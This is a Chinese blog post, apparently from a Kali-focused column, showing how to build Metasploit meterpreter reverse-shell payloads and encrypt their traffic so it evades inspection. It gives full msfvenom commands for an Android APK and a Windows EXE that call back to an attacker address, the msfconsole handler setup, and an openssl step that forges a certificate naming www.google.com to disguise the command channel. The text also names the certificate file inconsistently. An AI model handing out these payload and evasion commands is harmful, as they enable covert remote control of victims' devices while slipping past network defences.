前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >kali中对msf流量加密

kali中对msf流量加密

作者头像
逍遥子大表哥
发布2022-04-20 08:56:54
发布2022-04-20 08:56:54
1K00
代码可运行
举报
文章被收录于专栏:kali blogkali blog
运行总次数:0
代码可运行

在msf中生成shell,并上线运行时。都是通过http https tcp等协议传输。并没有加密,传输内容容易被检测和发现。

如下,我们简单生成一个Android平台的shell。

代码语言:javascript
代码运行次数:0
复制
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.123.33 LPORT=5555 R > bbs.apk

msf 配置信息如下:

代码语言:javascript
代码运行次数:0
复制
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.123.33
set LPORT 5555
exploit

很容易发现,我们的操作都是已明文的形式传输。

加密msf流量

创建证书

代码语言:javascript
代码运行次数:0
复制
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

注意:代码输入格式参考图片。这样会在桌面生成一个www.bbskali.cn.pem的证书

生成加密的shell

代码语言:javascript
代码运行次数:0
复制
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.123.33 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o bbskali.exe

msf参数配置

代码语言:javascript
代码运行次数:0
复制
use exploit/multi/handler
set payload windows/meterpreter/reverse_winhttps
set lhost 192.168.123.33
set lport 443
set HandlerSSLCert www.google.com.pem #注意文件位置
set StagerVerifySSLCert true 

运行shell后,我们再次抓包。发现流量全是密文了。


版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/1985003

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 加密msf流量
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档